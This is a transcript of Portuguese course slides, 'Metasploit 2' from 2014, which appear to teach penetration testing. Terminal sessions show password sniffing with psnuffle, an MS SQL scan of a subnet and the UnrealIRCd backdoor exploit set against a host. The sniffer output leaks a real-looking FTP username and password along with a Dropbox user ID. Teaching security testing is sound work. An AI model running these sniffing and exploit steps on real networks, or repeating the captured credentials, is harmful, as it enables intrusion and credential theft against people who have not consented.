Metasploit 2 - WordPress.com
Download
Report
Transcript Metasploit 2 - WordPress.com
Seja periódico e Consistente.
Em tudo, pela vida toda.
Principalmente nas questões relativas a segurança
Metasploit 2
Cerutti-IES 2014
O Que caracteriza um bom
Framework?
frameworks
SQL Microsoft
Cargas disponíveis
Saindo (descarregando) módulos
• Comando=back:
Password Sniffing
> use auxiliary/sniffer/psnuffle
msf > use auxiliary/sniffer/psnuffle
msf auxiliary(psnuffle) > run
[*] Auxiliary module execution completed
[*] Loaded protocol FTP from
/opt/metasploit/apps/pro/msf3/data/exploits/psnuffle/ftp.rb...
[*] Loaded protocol IMAP from
/opt/metasploit/apps/pro/msf3/data/exploits/psnuffle/imap.rb...
[*] Loaded protocol POP3 from
/opt/metasploit/apps/pro/msf3/data/exploits/psnuffle/pop3.rb...
[*] Loaded protocol SMB from
/opt/metasploit/apps/pro/msf3/data/exploits/psnuffle/smb.rb...
msf auxiliary(psnuffle) > [*] Loaded protocol URL from
/opt/metasploit/apps/pro/msf3/data/exploits/psnuffle/url.rb...
[*] Sniffing traffic.....
host_int=2716808549&ns_map=71378968_201026015668248%2C685054872_927498946
4&user_id=44464479&nid=1396008608701611341&ts=1415041703
[*] Failed FTP Login: 172.16.2.32:55773-143.106.10.149:21 >> fernandocerutti / baguinha
[*] HTTP GET: 172.16.2.32:51435-108.160.167.155:80
http://notify10.dropbox.com/subscribe?host_int=2716808549&ns_map=71378968_20102
6015668248%2C685054872_9274989464&user_id=44464479&nid=139600860870161134
1&ts=1415041759
[*] Successful FTP Login: 172.16.2.32:55773-143.106.10.149:21 >> anonymous /
[*] HTTP GET: 172.16.2.32:51435-108.160.167.155:80
http://notify10.dropbox.com/subscribe?host_int=2716808549&ns_map=71378968_20102
6015668248%2C685054872_9274989464&user_id=44464479&nid=139600860870161134
1&ts=1415041815
[*] Successful FTP Login: 172.16.2.32:55774-143.106.10.149:21 >> anonymous / caraca
http sem segurança- em texto plano
[*] HTTP GET: 172.16.2.32:55870-189.45.193.236:80 http://www.google-
analytics.com/__utm.gif?utmwv=5.6.0&utms=7&utmn=2092148068&utmhn=www.sli
deshare.net&utmt=event&utme=5(search_content*search_pageload*Description
%20HL%20Percentage)(216)8(member_type)9(FREE)11(1)&utmcs=UTF8&utmsr=1280x800&utmvp=1091x648&utmsc=24-bit&utmul=en-
us&utmje=1&utmfl=15.0%20r0&utmdt=%27metasploit%27%20on%20SlideShare&ut
mhid=1487026120&utmr=0&utmp=%2Fsearch%2Fslideshow%3Fsearchfrom%3Dheader
%26q%3Dmetasploit&utmht=1415042586183&utmac=UA-23304661&utmcc=__utma%3D186399478.1164355194.1409685008.1415014839.1415042574.33
%3B%2B__utmz%3D186399478.1414784276.30.12.utmcsr%3Dgoogle%7Cutmccn%3D(or
ganic)%7Cutmcmd%3Dorganic%7Cutmctr%3D(not%2520provided)%3B%2B__utmv%3D1
86399478.member%3B&utmjid=&utmu=6RAAACAAAAAAAAAAAAAAAAAE~
[*] HTTP GET: 172.16.2.32:55886-189.45.193.245:80
http://t0.gstatic.com/favicon?q=tbn:ANd9GcQC6FFzVoDxm5kTE5saE0q8AysNEyZiXdMtJwzLZrrD-93ly2lmHo0qH_eNWClKa8vX-zMT3w
sniff
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
] HTTP GET: 172.16.2.49:40582-91.189.89.22:80
http://videosearch.ubuntu.com/v0/search?q=&split=true&form_factor=desktop
[*] HTTP GET: 172.16.2.49:46231-189.45.193.241:80 http://i.ytimg.com/vi/ROhRv09bCWU/mqdefault.jpg
[*] HTTP GET: 172.16.2.49:46232-189.45.193.241:80 http://i.ytimg.com/vi/mO1QBTG6EXs/mqdefault.jpg
[*] HTTP GET: 172.16.2.49:46233-189.45.193.241:80 http://i.ytimg.com/vi/GH7noNdd1l8/mqdefault.jpg
[*] HTTP GET: 172.16.2.49:46234-189.45.193.241:80 http://i.ytimg.com/vi/GDlm84gSRv4/movieposter.jpg
[*] HTTP GET: 172.16.2.49:46235-189.45.193.241:80 http://i.ytimg.com/vi/vekNlWVqEnQ/mqdefault.jpg
[*] HTTP GET: 172.16.2.49:41898-189.45.193.211:80 http://i.ytimg.com/vi/hWLN8AATXlw/movieposter.jpg
[*] HTTP GET: 172.16.2.49:38110-189.45.193.249:80 http://i.ytimg.com/vi/RKs6ikmrLgg/movieposter.jpg
[*] HTTP GET: 172.16.2.49:43160-189.45.193.236:80 http://i.ytimg.com/vi/ZQRONGsLu4A/mqdefault.jpg
[*] HTTP GET: 172.16.2.49:50594-72.21.91.75:80 http://s1.dmcdn.net/AMRhc/80x60-9ja.jpg
[*] HTTP GET: 172.16.2.49:50595-72.21.91.75:80 http://s1.dmcdn.net/tFBO/80x60-YN8.jpg
[*] HTTP GET: 172.16.2.49:50596-72.21.91.75:80 http://s1.dmcdn.net/oiaV/80x60-YM6.jpg
[*] HTTP GET: 172.16.2.49:50597-72.21.91.75:80 http://s2.dmcdn.net/zw9I/80x60-M5j.jpg
[*] HTTP GET: 172.16.2.49:50598-72.21.91.75:80 http://s2.dmcdn.net/MRil/80x60-2HI.jpg
[*] HTTP GET: 172.16.2.49:51624-189.45.193.207:80 http://i.ytimg.com/vi/DTBWoKjtur8/movieposter.jpg
[*] HTTP GET: 172.16.2.49:55606-189.45.193.222:80 http://i.ytimg.com/vi/SV0VxWxg0oI/movieposter.jpg
[*] HTTP GET: 172.16.2.49:33244-189.45.193.221:80 http://i.ytimg.com/vi/m2qB16oWYTs/movieposter.jpg
[*] HTTP GET: 172.16.2.49:56212-189.45.193.237:80 http://i.ytimg.com/vi/n6op2UcrOFg/movieposter.jp
Ms SQL
msf > nmap -sU 192.168.0.0/24 -p1434
[*] exec: nmap -sU 192.168.0.0/24 -p1434
Starting Nmap 6.46 ( http://nmap.org ) at 2014-11-03 12:26 PST
Nmap scan report for 192.168.0.1
Host is up (0.049s latency).
PORT STATE
SERVICE
1434/udp open|filtered ms-sql-m
MAC Address: 84:C9:B2:55:A7:03 (D-Link International)
Nmap scan report for 192.168.0.109
Host is up (0.0053s latency).
PORT STATE SERVICE
1434/udp closed ms-sql-m
MAC Address: 00:0C:29:6F:8D:07 (VMware)
Nmap scan report for 192.168.0.119
Host is up (0.17s latency).
PORT STATE
SERVICE
1434/udp open|filtered ms-sql-m
MAC Address: 64:6C:B2:4E:62:B3 (Samsung Electronics Co.)
msf > use scanner/mssql/mssql_ping
•
•
•
•
•
msf auxiliary(mssql_ping) > set RHOSTS 192.168.0.0/24
RHOSTS => 192.168.0.0/24
msf auxiliary(mssql_ping) > set THREADS 20
THREADS => 20
msf auxiliary(mssql_ping) > exploit
•
•
•
•
•
•
•
•
•
•
•
•
[*] Scanned 026 of 256 hosts (010% complete)
[*] Scanned 052 of 256 hosts (020% complete)
[*] Scanned 079 of 256 hosts (030% complete)
[*] Scanned 104 of 256 hosts (040% complete)
[*] Scanned 141 of 256 hosts (055% complete)
[*] Scanned 154 of 256 hosts (060% complete)
[*] Scanned 182 of 256 hosts (071% complete)
[*] Scanned 206 of 256 hosts (080% complete)
[*] Scanned 244 of 256 hosts (095% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(mssql_ping) >
Backdoor no linux
• use
exploit/unix/irc/unreal_ircd_3281_backdoor
• msf exploit(unreal_ircd_3281_backdoor) >
• msf exploit(unreal_ircd_3281_backdoor) > set
RHOST 172.16.193.213
• RHOST => 172.16.193.213
• msf exploit(unreal_ircd_3281_backdoor) >
exploit
Saida exploit backdoor
Dotdefender
• Wget